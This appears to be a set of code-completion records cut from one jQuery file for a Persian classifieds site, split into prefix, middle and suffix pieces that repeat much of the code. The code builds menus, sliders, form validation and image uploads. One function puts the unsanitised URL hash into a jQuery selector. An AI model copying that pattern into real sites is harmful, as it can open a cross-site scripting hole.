$('#popularbazaar ul, #newbazaar ul').wrap( '<div class="wrap"></div>' );
$( "#popularbazaar .wrap, #newbazaar .wrap" ).each(function(){
$(this).scrollLeft($(this).children('ul').width())
})
$( "#popularbazaar ul, #newbazaar ul" ).each(function(){
$(this).width($(this).children('li').length * 155);
})
}
function listVerticaller() {
$( "#popularbazaar ul, #newbazaar ul" ).unwrap()
$( "#popularbazaar ul, #newbazaar ul" ).each(function(){
$(this).css({'width':'auto'});
})
}
function filterbarMobile() {
$('#filterbar button[name=grid]').removeClass('active');
$('#filterbar button[name=list]').addClass('active');
$('#ads .ad').removeClass('l-third').removeClass('m-half');
$('#ads .ad').addClass('l-full').addClass('m-full');
}
function filterbarNormal() {
$('#filterbar button[name=list]').removeClass('active');
$('#filterbar button[name=grid]').addClass('active');
$('#ads .ad').addClass('l-third').addClass('m-half');
$('#ads .ad').removeClass('l-full').removeClass('m-full');
}
// slider
function sliderBuild() {
numOfSlides = $('.slides .slide').length
$('.slider').append('<ul class="handle"></ul>')
for (var i = 1; i < numOfSlides + 1; i++) {
$('.slider .handle').append('<li class="sl' + i + '"></li>')
}
$('.slider').append('<div class="slh handle-next">Next</div><div class="slh handle-prev">Prev</div>')
$('.sl1').addClass('active');
$('.handle').css({
'top': ($('.slide').height() / 2) - ($('.handle').height() / 2)
})
}
function sliderResize() {
setTimeout(function () {
$('.handle').css({
'top': ($('.slide').height() / 2) - ($('.handle').height() / 2)
})
var num = parseInt($('.handle li.active').attr('class').split("sl")[1])
if (num === numOfSlides) {
num = 1
}
clearTimeout(timer);
$('.slider .handle li').removeClass('active');
$('.slider .sl' + num).addClass('active');
sliderRoll(num)
}, 700);
}
function sliderRoll(num) {
var move = (num - 1) * $('.slide')[0].getBoundingClientRect().height
$('.slides').animate({scrollTop : move},'1000')
$('.slider .handle li').removeClass('next').html('');
$('.slider .handle li').removeClass('prev').html('');
$('.slider .handle li.sl' + (num + 1)).addClass('next').html('');
$('.slider .handle li.sl' + (num - 1)).addClass('prev').html('');
timer = setTimeout(function(){
if (num === numOfSlides) {
num = 0
$('.slider .handle li.sl' + (num + 1)).addClass('next').html('');
}
$('.slider .sl' + (num + 1)).click()
},10000);
num + 1
}
$(document).on('click', '.slider .handle li', function() {
clearTimeout(timer);
ThisSlide = parseInt($(this).attr('class').split("sl")[1])
$('.slider .handle li').removeClass('active');
$(this).addClass('active');
sliderRoll(ThisSlide)
})
//scroll to element
function scrollToElement(element ,gap) {
if (menu) {
gap = gap + 48
}
var distance = $(element).offset().top - $("html, body").scrollTop() - gap
$("html, body").animate({
scrollTop : distance
},'500');
}
//change order
function changeOrder() {
$('body .order').each(function(){
var cl = $(this).attr('class')
if (window.innerWidth > 961) {
var order = cl[cl.search("o-l-") + 4];
$(this).clone().insertAfter($('body> *:nth-child(' + order + ')'))
$(this).remove()
}
if (window.innerWidth > 720 && window.innerWidth < 960) {
var order = cl[cl.search("o-m-") + 4];
$(this).clone().insertAfter($('body> *:nth-child(' + order + ')'))
$(this).remove()
}
if (window.innerWidth < 721) {
var order = cl[cl.search("o-s-") + 4];
$(this).clone().insertAfter($('body> *:nth-child(' + order + ')'))
$(this).remove()
}
})
}
//form Validator
$('form.validator label *').on('change blur', function(e) {
formValidator(e);
})
function formValidator(e) {
var input = e.currentTarget;
var form = e.currentTarget.form;
var massage = '<span class="errorMessage">پاسخ به این گزینه اجباری است.</span>'
//
for (var i = 0; i < form.length; i++) {
var value = form[i].value;
var required = $(form[i]).prop('required');
var checked = form[i].checked;
var type = form[i].type;
if (required) {
if (['text','email','phone','number','password', 'textarea'].indexOf(type) > -1) {
if (value === '') {
$(form[i]).attr('validate', false)
}else {
$(form[i]).attr('validate', true)
}
}
if (['select'].indexOf(type) > -1) {
if (value === '' || value === '---' || value === 'لطفا انتخاب فرمایید') {
$(form[i]).attr('validate', false)
}else {
$(form[i]).attr('validate', true)
}
}
if (['checkbox'].indexOf(type) > -1) {
if (!checked) {
$(form[i]).attr('validate', false)
}else {
$(form[i]).attr('validate', true)
}
}
}
}
//
if ($(input).attr('validate') === 'false') {
$(input).closest('label').addClass('error');
if ($(input).closest('label').children('.errorMessage').length < 1) {
$(input).closest('label').append(massage)
}
}
if ($(input).attr('validate') === 'true') {
$(input).closest('label').removeClass('error');
$(input).closest('label').children('.errorMessage').remove()
}
var errors = 0
for (var i = 0; i < form.length; i++) {
if ($(form[i]).attr('validate') === 'false') {
errors =+ 1
}
}
if (errors === 0) {
$(form).find('input[type=submit]').prop('disabled', false);
}else {
$(form).find('input[type=submit]').prop('disabled', true);
}
}
// currency field
$('input.currency').click(function(){
$(this).val('')
});
$('input.currency').change(function(){
var val = $(this).val().match(/\d+/)[0].replace(/\B(?=(\d{3})+(?!\d))/g, "٫");
$(this).val(val + ' ریال')
})
//Stats
function stats() {
maxH = "";
$('#stats ul li .visit').each(function(){
$(this).parent().append('<div class="bar"></div>');
if (parseInt($(this).text()) > maxH) {
maxH = parseInt($(this).text())
}
})
$('#stats ul li .visit').each(function(){
h = ((parseInt($(this).text()) / maxH)*100) + '%'
$(this).parent().children('.bar').height(h);
})
$('#stats ul li .bar').each(function(){
$(this).height($(this).height() - 60);
if ( $(this).height() < 1) {
$(this).height(2)
}
})
}
stats();
| {mobileModeEnd()} | conditional_block |
custom.js |
//////////////////////////////////////////////////////////////////////////////////
$(document).ready(function(){
//IE
isIE = /*@cc_on!@*/false || !!document.documentMode;
if (isIE) {
$( 'header, footer, main, aside' ).each(function(){
$(this).replaceWith( '<div class="ie-' + $(this).prop("tagName").toLowerCase() + '">' + $( this ).html() + "</div>" );
})
$('.ie-main').addClass('clearfix')
}
//header
//header - searchbox
$('#headertools button[name=search]').click(function(){
$('input.topbarSearch').focus();
})
$('input.topbarSearch').focus(function(){
$('#headertools button[name=search]').hide();
$('#headertools button[name=close]').show();
$('#topbar .title').hide()
});
$('input.topbarSearch').focusout(function(){
$('#headertools button[name=search]').show();
$('#headertools button[name=close]').hide();
setTimeout(function(){
$('#topbar .title').fadeIn()
},500);
});
// slider
if ($('.slider').length) {
sliderBuild();
sliderRoll(1);
}
//order
changeOrder()
//pop menue
$('.popmenu').not('.popmenu.active').click(function(){
$('.popmenu').removeClass('active');
$(this).addClass('active');
})
$(document).on('click', function (e) {
if ($('.popmenu.active').length && $(e.target).closest('.popmenu.active').length === 0) {
$('.popmenu').removeClass('active');
}
});
// hash links
if (window.location.hash.length) {
setTimeout(function () {
aHash(window.location.hash)
}, 1000);
}else {
setTimeout(function () {
aHash()
}, 1000);
}
$("a[href^=#]").click(function( e ) {
e.preventDefault();
aHash($(this).attr('href'))
})
function aHash(hash) {
if (hash) {
hash = hash
}else{
hash = $('.director a[href^=#]').attr('href')
}
if (hash && hash.length> 1) {
console.log(hash);
$("a[href^=#]").removeClass('active');
$('a[href=' + hash + ']').addClass('active');
window.location.hash = hash;
$('main > *.active').removeClass('active');
var hash = $(hash).get(0)
$(hash).addClass('active');
}
}
//click Effect
$('.cfx').click(function(e){
var elm = $(this);
var width = ($(this).width() * 1.5)
var xPos = Math.floor(e.pageX - elm.offset().left);
var yPos = Math.floor(e.pageY - elm.offset().top);
pob = ~~(Math.random() * 10000)
$(this).append('<div id="bubble' + pob + '" class="bubbleWrap"></div>');
$('#bubble' + pob).append('<div class="bubble"></div>');
$('#bubble' + pob + ' .bubble').css({
'left': xPos - (width / 2),
'top': yPos - (width / 2),
'width': width,
'height': width,
'-webkit-transform' : 'scale(0)',
'-moz-transform' : 'scale(0)',
'-ms-transform' : 'scale(0)',
'-o-transform' : 'scale(0)',
'transform' : 'scale(0)'
})
setTimeout(function () {
$('#bubble' + pob + ' .bubble').addClass('active')
}, 100);
setTimeout(function(){
// $('#bubble' + pob).remove()
},1000)
});
// box scroll fix
$('.scrlfix').bind('mousewheel DOMMouseScroll', function(e) {
var scrollTo = null;
if (e.type == 'mousewheel') {
scrollTo = (e.originalEvent.wheelDelta * -.1);
}
else if (e.type == 'DOMMouseScroll') {
scrollTo = .1 * e.originalEvent.detail;
}
if (scrollTo) {
e.preventDefault();
$(this).scrollTop(scrollTo + $(this).scrollTop());
}
});
//Moble Mode
if (window.innerWidth < 721) {mobileModeStart()};
if (window.innerWidth > 720) {mobileModeEnd()};
$(document).on('click', '#showmenu', function() {
$("#menu , #hidemenu").addClass("active");
$(this).removeClass("active");
$("#menu").offset({left: 0});
$("nav, #headertools").addClass("menu");
$('#topbar').append('<div id="dimmer"></div>');
$('html').css({'overflow':'hidden'});
$('body').append('<div id="menucover"></div>');
setTimeout(function () {
$('#dimmer').addClass('active');
$('#menucover').addClass('active');
}, 500);
})
$(document).on('click', '#dimmer ', function() {
$("#menu").removeClass("active");
$("#menu").offset({left: -250});
$("nav, #headertools").removeClass("menu");
$('html').css({'overflow':'auto'});
$("#showmenu").addClass("active");
$('#hidemenu').removeClass("active");
$(this).remove();
$('#menucover').remove();
});
$(document).on('click', '#hidemenu ', function() {
$("#dimmer").click();
});
// bazaar page
$('#ads .ad section').click(function(e){
if (e.target.nodeName != 'BUTTON') {
var target = $(this).closest('section').children('a').attr('href')
window.location.href = target
}
});
// bazaar page - filter bar
$('#filterbar button[name=list]').click(function(){
$('#filterbar button[name=grid]').removeClass('active');
$(this).addClass('active');
$('#ads .ad').removeClass('l-third').removeClass('m-half');
$('#ads .ad').addClass('l-full').addClass('m-full');
})
$('#filterbar button[name=grid]').click(function(){
$('#filterbar button[name=list]').removeClass('active');
$(this).addClass('active');
$('#ads .ad').addClass('l-third').addClass('m-half');
$('#ads .ad').removeClass('l-full').removeClass('m-full');
})
$('#filterbar button[name=filters]').click(function(){
$(this).toggleClass('active');
$('#filters').toggleClass('active');
})
$('#filterbar button[name=sort]').click(function(){
$(this).toggleClass('active');
$('#sort').toggleClass('active');
})
$('#sort, #filters').children('button[name=close]').click(function(){
var name = $(this).closest('section').attr('id');
$('#filterbar button[name=' + name + ']').click();
})
//ad page
$('#adGalleryList .thumbnail').click(function(){
$('#adGalleryList .thumbnail').removeClass('active');
$(this).addClass('active');
var src = $(this).attr('imgsrc')
$('#adGallerySelected').css({'background':'url(' + src + ')'})
})
// bookmark button
$('button[name=bookmark]').click(function(){
alert('Bookmark Test')
})
//forms
$('input[name=resetpassword]').click(function(){
$('#password-reset').show()
$(this).hide()
})
// image selectors
$(document).on('change', 'input[type=file]', function() {
if (this.files && this.files[0]) {
var target = '.' + $(this).attr('t')
var reader = new FileReader();
reader.onload = function (e) {
$(target).css({'background': 'url(' + e.target.result + ')'}).show();
};
reader.readAsDataURL(this.files[0]);
}
})
//image add
imgNum = $('.box.pics div').length + 1;
$('input[name=addPicture]').click(function(){
if (imgNum < 5) {
var fieldset = $(this).closest('fieldset').get(0)
var box = $(fieldset).children('.box')
$(fieldset).append('<input type="file" name="adp-' + imgNum + '" accept="image/*" t="adp-' + imgNum + '" >')
$(box).removeClass('hidden').append('<div style="display:none;" class="adp-' + imgNum + '"><i ></i></div>')
$('input[name=adp-' + imgNum + ']').click();
imgNum = imgNum + 1;
}else{
alert('شما حداکثر مجاز به انتخاب چهار تصویر برای هر آگهی هستید!')
}
})
// image remove
$(document).on('click', '.box > div ', function() {
$(this).remove()
$('input[name=' + $(this).attr('class') + ']').remove();
imgNum = imgNum - 1;
$('input[name=addPicture]').prop('disabled', false);
//
var input = $('body input[name^=adp]');
for (var i = 0; i < input.length; i++) {
var element = input[i]
$(element).attr('name', 'adp-' + (i+1)).attr('t' , 'adp-' + (i+1))
}
var image = $('body .box.pics div');
for (var i = 0; i < image.length; i++) {
var element = image[i]
$(element).attr('class' , 'adp-' + (i+1))
}
});
});
//////////////////////////////////////////////////////////////////////////////////
$(window).resize(function(){
if (window.innerWidth < 721) {mobileModeStart()};
if (window.innerWidth > 720) {mobileModeEnd()};
if ($('.slider').length) {
sliderResize()
}
changeOrder()
});
//////////////////////////////////////////////////////////////////////////////////
menu = false
//Moble mode
function mobileModeStart() {
if (menu !== true && $('body.msg').length < 1) {
mobileMenuBuild();
listHorizontaller()
filterbarMobile()
}
}
function mobileModeEnd() {
if (menu) {
mobileMenuremover();
listVerticaller()
filterbarNormal()
}
}
function mobileMenuBuild() {
$('#headertools').wrap( '<div class="clearfix" id="menu"></div>' );
$('nav, #footersitemap, #footersocials').appendTo('#menu');
$('body').append('<button id="showmenu" title="منو" type="button" class="icon cfx active" name="menu"></button>');
$('body').append('<button id="hidemenu" title="بستن" type="button" class="icon cfx" name="menu"></button>');
menu = true;
}
function mobileMenuremover() {
$('nav, #headertools').unwrap();
$('#showmenu, #hidemenu').remove();
if (isIE) {
$('#footersitemap, #footersocials').appendTo('.ie-footer');
}else {
$('#footersitemap, #footersocials').appendTo('footer');
}
menu = false;
}
function listHorizontaller() {
$('#popularbazaar ul, #newbazaar ul').wrap( '<div class="wrap"></div>' );
$( "#popularbazaar .wrap, #newbazaar .wrap" ).each(function(){
$(this).scrollLeft($(this).children('ul').width())
})
$( "#popularbazaar ul, #newbazaar ul" ).each(function(){
$(this).width($(this).children('li').length * 155);
})
}
function listVerticaller() {
$( "#popularbazaar ul, #newbazaar ul" ).unwrap()
| name=grid]').removeClass('active');
$('#filterbar button[name=list]').addClass('active');
$('#ads .ad').removeClass('l-third').removeClass('m-half');
$('#ads .ad').addClass('l-full').addClass('m-full');
}
function filterbarNormal() {
$('#filterbar button[name=list]').removeClass('active');
$('#filterbar button[name=grid]').addClass('active');
$('#ads .ad').addClass('l-third').addClass('m-half');
$('#ads .ad').removeClass('l-full').removeClass('m-full');
}
// slider
function sliderBuild() {
numOfSlides = $('.slides .slide').length
$('.slider').append('<ul class="handle"></ul>')
for (var i = 1; i < numOfSlides + 1; i++) {
$('.slider .handle').append('<li class="sl' + i + '"></li>')
}
$('.slider').append('<div class="slh handle-next">Next</div><div class="slh handle-prev">Prev</div>')
$('.sl1').addClass('active');
$('.handle').css({
'top': ($('.slide').height() / 2) - ($('.handle').height() / 2)
})
}
function sliderResize() {
setTimeout(function () {
$('.handle').css({
'top': ($('.slide').height() / 2) - ($('.handle').height() / 2)
})
var num = parseInt($('.handle li.active').attr('class').split("sl")[1])
if (num === numOfSlides) {
num = 1
}
clearTimeout(timer);
$('.slider .handle li').removeClass('active');
$('.slider .sl' + num).addClass('active');
sliderRoll(num)
}, 700);
}
function sliderRoll(num) {
var move = (num - 1) * $('.slide')[0].getBoundingClientRect().height
$('.slides').animate({scrollTop : move},'1000')
$('.slider .handle li').removeClass('next').html('');
$('.slider .handle li').removeClass('prev').html('');
$('.slider .handle li.sl' + (num + 1)).addClass('next').html('');
$('.slider .handle li.sl' + (num - 1)).addClass('prev').html('');
timer = setTimeout(function(){
if (num === numOfSlides) {
num = 0
$('.slider .handle li.sl' + (num + 1)).addClass('next').html('');
}
$('.slider .sl' + (num + 1)).click()
},10000);
num + 1
}
$(document).on('click', '.slider .handle li', function() {
clearTimeout(timer);
ThisSlide = parseInt($(this).attr('class').split("sl")[1])
$('.slider .handle li').removeClass('active');
$(this).addClass('active');
sliderRoll(ThisSlide)
})
//scroll to element
function scrollToElement(element ,gap) {
if (menu) {
gap = gap + 48
}
var distance = $(element).offset().top - $("html, body").scrollTop() - gap
$("html, body").animate({
scrollTop : distance
},'500');
}
//change order
function changeOrder() {
$('body .order').each(function(){
var cl = $(this).attr('class')
if (window.innerWidth > 961) {
var order = cl[cl.search("o-l-") + 4];
$(this).clone().insertAfter($('body> *:nth-child(' + order + ')'))
$(this).remove()
}
if (window.innerWidth > 720 && window.innerWidth < 960) {
var order = cl[cl.search("o-m-") + 4];
$(this).clone().insertAfter($('body> *:nth-child(' + order + ')'))
$(this).remove()
}
if (window.innerWidth < 721) {
var order = cl[cl.search("o-s-") + 4];
$(this).clone().insertAfter($('body> *:nth-child(' + order + ')'))
$(this).remove()
}
})
}
//form Validator
$('form.validator label *').on('change blur', function(e) {
formValidator(e);
})
function formValidator(e) {
var input = e.currentTarget;
var form = e.currentTarget.form;
var massage = '<span class="errorMessage">پاسخ به این گزینه اجباری است.</span>'
//
for (var i = 0; i < form.length; i++) {
var value = form[i].value;
var required = $(form[i]).prop('required');
var checked = form[i].checked;
var type = form[i].type;
if (required) {
if (['text','email','phone','number','password', 'textarea'].indexOf(type) > -1) {
if (value === '') {
$(form[i]).attr('validate', false)
}else {
$(form[i]).attr('validate', true)
}
}
if (['select'].indexOf(type) > -1) {
if (value === '' || value === '---' || value === 'لطفا انتخاب فرمایید') {
$(form[i]).attr('validate', false)
}else {
$(form[i]).attr('validate', true)
}
}
if (['checkbox'].indexOf(type) > -1) {
if (!checked) {
$(form[i]).attr('validate', false)
}else {
$(form[i]).attr('validate', true)
}
}
}
}
//
if ($(input).attr('validate') === 'false') {
$(input).closest('label').addClass('error');
if ($(input).closest('label').children('.errorMessage').length < 1) {
$(input).closest('label').append(massage)
}
}
if ($(input).attr('validate') === 'true') {
$(input).closest('label').removeClass('error');
$(input).closest('label').children('.errorMessage').remove()
}
var errors = 0
for (var i = 0; i < form.length; i++) {
if ($(form[i]).attr('validate') === 'false') {
errors =+ 1
}
}
if (errors === 0) {
$(form).find('input[type=submit]').prop('disabled', false);
}else {
$(form).find('input[type=submit]').prop('disabled', true);
}
}
// currency field
$('input.currency').click(function(){
$(this).val('')
});
$('input.currency').change(function(){
var val = $(this).val().match(/\d+/)[0].replace(/\B(?=(\d{3})+(?!\d))/g, "٫");
$(this).val(val + ' ریال')
})
//Stats
function stats() {
maxH = "";
$('#stats ul li .visit').each(function(){
$(this).parent().append('<div class="bar"></div>');
if (parseInt($(this).text()) > maxH) {
maxH = parseInt($(this).text())
}
})
$('#stats ul li .visit').each(function(){
h = ((parseInt($(this).text()) / maxH)*100) + '%'
$(this).parent().children('.bar').height(h);
})
$('#stats ul li .bar').each(function(){
$(this).height($(this).height() - 60);
if ( $(this).height() < 1) {
$(this).height(2)
}
})
}
stats();
| $( "#popularbazaar ul, #newbazaar ul" ).each(function(){
$(this).css({'width':'auto'});
})
}
function filterbarMobile() {
$('#filterbar button[ | identifier_body |
custom.js |
//////////////////////////////////////////////////////////////////////////////////
$(document).ready(function(){
//IE
isIE = /*@cc_on!@*/false || !!document.documentMode;
if (isIE) {
$( 'header, footer, main, aside' ).each(function(){
$(this).replaceWith( '<div class="ie-' + $(this).prop("tagName").toLowerCase() + '">' + $( this ).html() + "</div>" );
})
$('.ie-main').addClass('clearfix')
}
//header
//header - searchbox
$('#headertools button[name=search]').click(function(){
$('input.topbarSearch').focus();
})
$('input.topbarSearch').focus(function(){
$('#headertools button[name=search]').hide();
$('#headertools button[name=close]').show();
$('#topbar .title').hide()
});
$('input.topbarSearch').focusout(function(){
$('#headertools button[name=search]').show();
$('#headertools button[name=close]').hide();
setTimeout(function(){
$('#topbar .title').fadeIn()
},500);
});
// slider
if ($('.slider').length) {
sliderBuild();
sliderRoll(1);
}
//order
changeOrder()
//pop menue
$('.popmenu').not('.popmenu.active').click(function(){
$('.popmenu').removeClass('active');
$(this).addClass('active');
})
$(document).on('click', function (e) {
if ($('.popmenu.active').length && $(e.target).closest('.popmenu.active').length === 0) {
$('.popmenu').removeClass('active');
}
});
// hash links
if (window.location.hash.length) {
setTimeout(function () {
aHash(window.location.hash)
}, 1000);
}else {
setTimeout(function () {
aHash()
}, 1000);
}
$("a[href^=#]").click(function( e ) {
e.preventDefault();
aHash($(this).attr('href'))
})
function | (hash) {
if (hash) {
hash = hash
}else{
hash = $('.director a[href^=#]').attr('href')
}
if (hash && hash.length> 1) {
console.log(hash);
$("a[href^=#]").removeClass('active');
$('a[href=' + hash + ']').addClass('active');
window.location.hash = hash;
$('main > *.active').removeClass('active');
var hash = $(hash).get(0)
$(hash).addClass('active');
}
}
//click Effect
$('.cfx').click(function(e){
var elm = $(this);
var width = ($(this).width() * 1.5)
var xPos = Math.floor(e.pageX - elm.offset().left);
var yPos = Math.floor(e.pageY - elm.offset().top);
pob = ~~(Math.random() * 10000)
$(this).append('<div id="bubble' + pob + '" class="bubbleWrap"></div>');
$('#bubble' + pob).append('<div class="bubble"></div>');
$('#bubble' + pob + ' .bubble').css({
'left': xPos - (width / 2),
'top': yPos - (width / 2),
'width': width,
'height': width,
'-webkit-transform' : 'scale(0)',
'-moz-transform' : 'scale(0)',
'-ms-transform' : 'scale(0)',
'-o-transform' : 'scale(0)',
'transform' : 'scale(0)'
})
setTimeout(function () {
$('#bubble' + pob + ' .bubble').addClass('active')
}, 100);
setTimeout(function(){
// $('#bubble' + pob).remove()
},1000)
});
// box scroll fix
$('.scrlfix').bind('mousewheel DOMMouseScroll', function(e) {
var scrollTo = null;
if (e.type == 'mousewheel') {
scrollTo = (e.originalEvent.wheelDelta * -.1);
}
else if (e.type == 'DOMMouseScroll') {
scrollTo = .1 * e.originalEvent.detail;
}
if (scrollTo) {
e.preventDefault();
$(this).scrollTop(scrollTo + $(this).scrollTop());
}
});
//Moble Mode
if (window.innerWidth < 721) {mobileModeStart()};
if (window.innerWidth > 720) {mobileModeEnd()};
$(document).on('click', '#showmenu', function() {
$("#menu , #hidemenu").addClass("active");
$(this).removeClass("active");
$("#menu").offset({left: 0});
$("nav, #headertools").addClass("menu");
$('#topbar').append('<div id="dimmer"></div>');
$('html').css({'overflow':'hidden'});
$('body').append('<div id="menucover"></div>');
setTimeout(function () {
$('#dimmer').addClass('active');
$('#menucover').addClass('active');
}, 500);
})
$(document).on('click', '#dimmer ', function() {
$("#menu").removeClass("active");
$("#menu").offset({left: -250});
$("nav, #headertools").removeClass("menu");
$('html').css({'overflow':'auto'});
$("#showmenu").addClass("active");
$('#hidemenu').removeClass("active");
$(this).remove();
$('#menucover').remove();
});
$(document).on('click', '#hidemenu ', function() {
$("#dimmer").click();
});
// bazaar page
$('#ads .ad section').click(function(e){
if (e.target.nodeName != 'BUTTON') {
var target = $(this).closest('section').children('a').attr('href')
window.location.href = target
}
});
// bazaar page - filter bar
$('#filterbar button[name=list]').click(function(){
$('#filterbar button[name=grid]').removeClass('active');
$(this).addClass('active');
$('#ads .ad').removeClass('l-third').removeClass('m-half');
$('#ads .ad').addClass('l-full').addClass('m-full');
})
$('#filterbar button[name=grid]').click(function(){
$('#filterbar button[name=list]').removeClass('active');
$(this).addClass('active');
$('#ads .ad').addClass('l-third').addClass('m-half');
$('#ads .ad').removeClass('l-full').removeClass('m-full');
})
$('#filterbar button[name=filters]').click(function(){
$(this).toggleClass('active');
$('#filters').toggleClass('active');
})
$('#filterbar button[name=sort]').click(function(){
$(this).toggleClass('active');
$('#sort').toggleClass('active');
})
$('#sort, #filters').children('button[name=close]').click(function(){
var name = $(this).closest('section').attr('id');
$('#filterbar button[name=' + name + ']').click();
})
//ad page
$('#adGalleryList .thumbnail').click(function(){
$('#adGalleryList .thumbnail').removeClass('active');
$(this).addClass('active');
var src = $(this).attr('imgsrc')
$('#adGallerySelected').css({'background':'url(' + src + ')'})
})
// bookmark button
$('button[name=bookmark]').click(function(){
alert('Bookmark Test')
})
//forms
$('input[name=resetpassword]').click(function(){
$('#password-reset').show()
$(this).hide()
})
// image selectors
$(document).on('change', 'input[type=file]', function() {
if (this.files && this.files[0]) {
var target = '.' + $(this).attr('t')
var reader = new FileReader();
reader.onload = function (e) {
$(target).css({'background': 'url(' + e.target.result + ')'}).show();
};
reader.readAsDataURL(this.files[0]);
}
})
//image add
imgNum = $('.box.pics div').length + 1;
$('input[name=addPicture]').click(function(){
if (imgNum < 5) {
var fieldset = $(this).closest('fieldset').get(0)
var box = $(fieldset).children('.box')
$(fieldset).append('<input type="file" name="adp-' + imgNum + '" accept="image/*" t="adp-' + imgNum + '" >')
$(box).removeClass('hidden').append('<div style="display:none;" class="adp-' + imgNum + '"><i ></i></div>')
$('input[name=adp-' + imgNum + ']').click();
imgNum = imgNum + 1;
}else{
alert('شما حداکثر مجاز به انتخاب چهار تصویر برای هر آگهی هستید!')
}
})
// image remove
$(document).on('click', '.box > div ', function() {
$(this).remove()
$('input[name=' + $(this).attr('class') + ']').remove();
imgNum = imgNum - 1;
$('input[name=addPicture]').prop('disabled', false);
//
var input = $('body input[name^=adp]');
for (var i = 0; i < input.length; i++) {
var element = input[i]
$(element).attr('name', 'adp-' + (i+1)).attr('t' , 'adp-' + (i+1))
}
var image = $('body .box.pics div');
for (var i = 0; i < image.length; i++) {
var element = image[i]
$(element).attr('class' , 'adp-' + (i+1))
}
});
});
//////////////////////////////////////////////////////////////////////////////////
$(window).resize(function(){
if (window.innerWidth < 721) {mobileModeStart()};
if (window.innerWidth > 720) {mobileModeEnd()};
if ($('.slider').length) {
sliderResize()
}
changeOrder()
});
//////////////////////////////////////////////////////////////////////////////////
menu = false
//Moble mode
function mobileModeStart() {
if (menu !== true && $('body.msg').length < 1) {
mobileMenuBuild();
listHorizontaller()
filterbarMobile()
}
}
function mobileModeEnd() {
if (menu) {
mobileMenuremover();
listVerticaller()
filterbarNormal()
}
}
function mobileMenuBuild() {
$('#headertools').wrap( '<div class="clearfix" id="menu"></div>' );
$('nav, #footersitemap, #footersocials').appendTo('#menu');
$('body').append('<button id="showmenu" title="منو" type="button" class="icon cfx active" name="menu"></button>');
$('body').append('<button id="hidemenu" title="بستن" type="button" class="icon cfx" name="menu"></button>');
menu = true;
}
function mobileMenuremover() {
$('nav, #headertools').unwrap();
$('#showmenu, #hidemenu').remove();
if (isIE) {
$('#footersitemap, #footersocials').appendTo('.ie-footer');
}else {
$('#footersitemap, #footersocials').appendTo('footer');
}
menu = false;
}
function listHorizontaller() {
$('#popularbazaar ul, #newbazaar ul').wrap( '<div class="wrap"></div>' );
$( "#popularbazaar .wrap, #newbazaar .wrap" ).each(function(){
$(this).scrollLeft($(this).children('ul').width())
})
$( "#popularbazaar ul, #newbazaar ul" ).each(function(){
$(this).width($(this).children('li').length * 155);
})
}
function listVerticaller() {
$( "#popularbazaar ul, #newbazaar ul" ).unwrap()
$( "#popularbazaar ul, #newbazaar ul" ).each(function(){
$(this).css({'width':'auto'});
})
}
function filterbarMobile() {
$('#filterbar button[name=grid]').removeClass('active');
$('#filterbar button[name=list]').addClass('active');
$('#ads .ad').removeClass('l-third').removeClass('m-half');
$('#ads .ad').addClass('l-full').addClass('m-full');
}
function filterbarNormal() {
$('#filterbar button[name=list]').removeClass('active');
$('#filterbar button[name=grid]').addClass('active');
$('#ads .ad').addClass('l-third').addClass('m-half');
$('#ads .ad').removeClass('l-full').removeClass('m-full');
}
// slider
function sliderBuild() {
numOfSlides = $('.slides .slide').length
$('.slider').append('<ul class="handle"></ul>')
for (var i = 1; i < numOfSlides + 1; i++) {
$('.slider .handle').append('<li class="sl' + i + '"></li>')
}
$('.slider').append('<div class="slh handle-next">Next</div><div class="slh handle-prev">Prev</div>')
$('.sl1').addClass('active');
$('.handle').css({
'top': ($('.slide').height() / 2) - ($('.handle').height() / 2)
})
}
function sliderResize() {
setTimeout(function () {
$('.handle').css({
'top': ($('.slide').height() / 2) - ($('.handle').height() / 2)
})
var num = parseInt($('.handle li.active').attr('class').split("sl")[1])
if (num === numOfSlides) {
num = 1
}
clearTimeout(timer);
$('.slider .handle li').removeClass('active');
$('.slider .sl' + num).addClass('active');
sliderRoll(num)
}, 700);
}
function sliderRoll(num) {
var move = (num - 1) * $('.slide')[0].getBoundingClientRect().height
$('.slides').animate({scrollTop : move},'1000')
$('.slider .handle li').removeClass('next').html('');
$('.slider .handle li').removeClass('prev').html('');
$('.slider .handle li.sl' + (num + 1)).addClass('next').html('');
$('.slider .handle li.sl' + (num - 1)).addClass('prev').html('');
timer = setTimeout(function(){
if (num === numOfSlides) {
num = 0
$('.slider .handle li.sl' + (num + 1)).addClass('next').html('');
}
$('.slider .sl' + (num + 1)).click()
},10000);
num + 1
}
$(document).on('click', '.slider .handle li', function() {
clearTimeout(timer);
ThisSlide = parseInt($(this).attr('class').split("sl")[1])
$('.slider .handle li').removeClass('active');
$(this).addClass('active');
sliderRoll(ThisSlide)
})
//scroll to element
function scrollToElement(element ,gap) {
if (menu) {
gap = gap + 48
}
var distance = $(element).offset().top - $("html, body").scrollTop() - gap
$("html, body").animate({
scrollTop : distance
},'500');
}
//change order
function changeOrder() {
$('body .order').each(function(){
var cl = $(this).attr('class')
if (window.innerWidth > 961) {
var order = cl[cl.search("o-l-") + 4];
$(this).clone().insertAfter($('body> *:nth-child(' + order + ')'))
$(this).remove()
}
if (window.innerWidth > 720 && window.innerWidth < 960) {
var order = cl[cl.search("o-m-") + 4];
$(this).clone().insertAfter($('body> *:nth-child(' + order + ')'))
$(this).remove()
}
if (window.innerWidth < 721) {
var order = cl[cl.search("o-s-") + 4];
$(this).clone().insertAfter($('body> *:nth-child(' + order + ')'))
$(this).remove()
}
})
}
//form Validator
$('form.validator label *').on('change blur', function(e) {
formValidator(e);
})
function formValidator(e) {
var input = e.currentTarget;
var form = e.currentTarget.form;
var massage = '<span class="errorMessage">پاسخ به این گزینه اجباری است.</span>'
//
for (var i = 0; i < form.length; i++) {
var value = form[i].value;
var required = $(form[i]).prop('required');
var checked = form[i].checked;
var type = form[i].type;
if (required) {
if (['text','email','phone','number','password', 'textarea'].indexOf(type) > -1) {
if (value === '') {
$(form[i]).attr('validate', false)
}else {
$(form[i]).attr('validate', true)
}
}
if (['select'].indexOf(type) > -1) {
if (value === '' || value === '---' || value === 'لطفا انتخاب فرمایید') {
$(form[i]).attr('validate', false)
}else {
$(form[i]).attr('validate', true)
}
}
if (['checkbox'].indexOf(type) > -1) {
if (!checked) {
$(form[i]).attr('validate', false)
}else {
$(form[i]).attr('validate', true)
}
}
}
}
//
if ($(input).attr('validate') === 'false') {
$(input).closest('label').addClass('error');
if ($(input).closest('label').children('.errorMessage').length < 1) {
$(input).closest('label').append(massage)
}
}
if ($(input).attr('validate') === 'true') {
$(input).closest('label').removeClass('error');
